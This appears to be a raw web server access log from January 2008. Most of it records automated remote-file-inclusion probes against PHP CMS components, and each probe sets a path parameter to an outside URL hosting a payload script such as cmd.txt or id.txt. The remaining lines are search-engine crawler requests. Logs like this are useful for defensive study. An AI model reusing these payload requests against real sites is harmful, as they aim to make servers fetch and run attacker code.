210.245.164.10 - - [22/Jan/2008:13:19:20 -0800] "GET /logs/access_071229.log//index.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.78.173.10 - - [22/Jan/2008:13:19:27 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.xresponder.com//admin/includes/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:19:55 -0800] "GET /index.php?redir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:20:29 -0800] "GET /logs/access_071222.log//smarty.php?xcart_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:20:30 -0800] "GET //smarty.php?xcart_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:20:31 -0800] "GET /logs//smarty.php?xcart_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.33 - - [22/Jan/2008:13:20:32 -0800] "GET /tmp/?M=A HTTP/1.0" 200 1491 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [22/Jan/2008:13:20:46 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.160.78.135 - - [22/Jan/2008:13:20:58 -0800] "GET /logs//includes/kb_constants.php?module_root_path=http://www.blackgovernment.de/help/css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.160.78.135 - - [22/Jan/2008:13:20:58 -0800] "GET //includes/kb_constants.php?module_root_path=http://www.blackgovernment.de/help/css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.233.194.158 - - [22/Jan/2008:13:21:13 -0800] "GET //convert/mvcw.php?step=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.233.194.158 - - [22/Jan/2008:13:21:13 -0800] "GET /logs//convert/mvcw.php?step=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.233.194.158 - - [22/Jan/2008:13:21:14 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:21:28 -0800] "GET //index.php?pageurl=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:22:22 -0800] "GET //index.php?pageurl=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.204.70 - - [22/Jan/2008:13:24:02 -0800] "GET /logs/access_071229.log%20%20//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:24:18 -0800] "GET /logs/access_071224.log//zero_vote/ask_password.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.59.82.140 - - [22/Jan/2008:13:24:21 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 200 23376 "http://www.st-owners.com/forums/showthread.php?t=34378" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:24:23 -0800] "GET //zero_vote/ask_password.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:24:25 -0800] "GET /logs//zero_vote/ask_password.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:24:37 -0800] "GET /logs/access_071228.log//zero_vote/ask_password.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.204.70 - - [22/Jan/2008:13:24:48 -0800] "GET /logs//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.204.11.65 - - [22/Jan/2008:13:25:12 -0800] "GET //modules/xfsection/modify.php?dir_module=http://ramosk.altervista.org/coyote.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.204.70 - - [22/Jan/2008:13:25:23 -0800] "GET /logs/access_071229.log//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:13:26:51 -0800] "GET /logs/access_080101.log/index.php?redir=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [22/Jan/2008:13:28:32 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [22/Jan/2008:13:28:32 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.3.70 - - [22/Jan/2008:13:29:11 -0800] "GET /logs/access_071229.log//index.php?option=com_puarcade&task=cat_view&gid=&mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:30:53 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:30:53 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:30:54 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.22.36 - - [22/Jan/2008:13:31:05 -0800] "GET /logs/access_071212.log HTTP/1.0" 200 89527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:31:11 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.209.12.83 - - [22/Jan/2008:13:33:48 -0800] "GET //login.php?dir=http://dd3str0y3r.110mb.com/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
193.209.12.83 - - [22/Jan/2008:13:33:48 -0800] "GET /logs//login.php?dir=http://dd3str0y3r.110mb.com/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:13:34:20 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.78.173.10 - - [22/Jan/2008:13:37:35 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.xresponder.com//admin/includes/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.173.10 - - [22/Jan/2008:13:37:36 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.xresponder.com//admin/includes/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.173.10 - - [22/Jan/2008:13:37:59 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.xresponder.com//admin/includes/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:38:46 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:38:46 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:38:47 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.193.50 - - [22/Jan/2008:13:40:33 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.84.193.50 - - [22/Jan/2008:13:40:33 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
88.191.20.52 - - [22/Jan/2008:13:41:01 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.saenterpriseworkshop.com/vnc/MIC22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:41:10 -0800] "GET /logs/access_071221.log//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:41:12 -0800] "GET //SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:41:13 -0800] "GET /logs//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:42:08 -0800] "GET /logs/access_080101.log//index.php?pageurl=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:42:08 -0800] "GET /logs//index.php?pageurl=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:42:10 -0800] "GET /logs/access_080101.log//index.php?pageurl=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:42:11 -0800] "GET /logs//index.php?pageurl=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:42:58 -0800] "GET /logs/access_071224.log//index.php?pageurl=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:13:43:01 -0800] "GET /logs/access_071224.log//index.php?pageurl=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.169.80 - - [22/Jan/2008:13:43:51 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://site.com/~dun/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [22/Jan/2008:13:43:51 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://site.com/~dun/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.237.143 - - [22/Jan/2008:13:45:18 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [22/Jan/2008:13:45:19 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [22/Jan/2008:13:45:19 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.233.194.158 - - [22/Jan/2008:13:45:24 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.233.194.158 - - [22/Jan/2008:13:45:25 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.233.194.158 - - [22/Jan/2008:13:45:25 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.67.237.143 - - [22/Jan/2008:13:45:29 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.233.194.158 - - [22/Jan/2008:13:45:36 -0800] "GET /logs/access_071228.log//modules/xfsection/modify.php?dir_module=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.214.232 - - [22/Jan/2008:13:45:48 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.161 - - [22/Jan/2008:13:46:45 -0800] "GET /?S=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:13:46:56 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:13:46:57 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:13:46:58 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
74.6.23.232 - - [22/Jan/2008:13:49:28 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:13:50:15 -0800] "GET /logs/access.log/index.php?body=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:13:50:15 -0800] "GET /index.php?body=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:13:50:15 -0800] "GET /logs/index.php?body=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:51:44 -0800] "GET /logs/access_071224.log//impex/ImpExData.php?systempath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:51:50 -0800] "GET //impex/ImpExData.php?systempath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:13:51:52 -0800] "GET /logs//impex/ImpExData.php?systempath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.4.3 - - [22/Jan/2008:13:51:54 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [22/Jan/2008:13:51:54 -0800] "GET /convert/mvcw.php?vwar_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [22/Jan/2008:13:51:55 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.26.63.12 - - [22/Jan/2008:13:52:10 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:13:52:17 -0800] "GET /logs/access_071225.log/index.php?body=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.164.10 - - [22/Jan/2008:13:52:21 -0800] "GET /logs/access_071224.log//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.4.3 - - [22/Jan/2008:13:53:20 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:13:54:13 -0800] "GET /minamijewelry/html/images/jewelry/F2t.jpg HTTP/1.0" 200 2542 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:13:54:13 -0800] "GET /minamijewelry/html/images/jewelry/F4t.jpg HTTP/1.0" 200 4348 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:13:54:13 -0800] "GET /minamijewelry/html/images/jewelry/C1.jpg HTTP/1.0" 200 61368 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:13:54:14 -0800] "GET /minamijewelry/html/kids.html HTTP/1.0" 200 19771 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:13:54:14 -0800] "GET /minamijewelry/html/wind.html HTTP/1.0" 200 20883 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
81.91.66.79 - - [22/Jan/2008:13:56:37 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:56:45 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:56:45 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.119.158.50 - - [22/Jan/2008:13:56:46 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:56:46 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:56:49 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:56:54 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:56:55 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.94.1.95 - - [22/Jan/2008:13:57:08 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.91.66.79 - - [22/Jan/2008:13:58:44 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.91.66.79 - - [22/Jan/2008:13:58:44 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [22/Jan/2008:13:58:56 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [22/Jan/2008:13:58:57 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.91.66.79 - - [22/Jan/2008:13:59:02 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [22/Jan/2008:13:59:10 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:59:29 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:59:29 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:59:29 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:59:40 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:59:40 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [22/Jan/2008:13:59:41 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
124.32.128.178 - - [22/Jan/2008:14:03:50 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:14:04:32 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:14:04:33 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:14:04:34 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
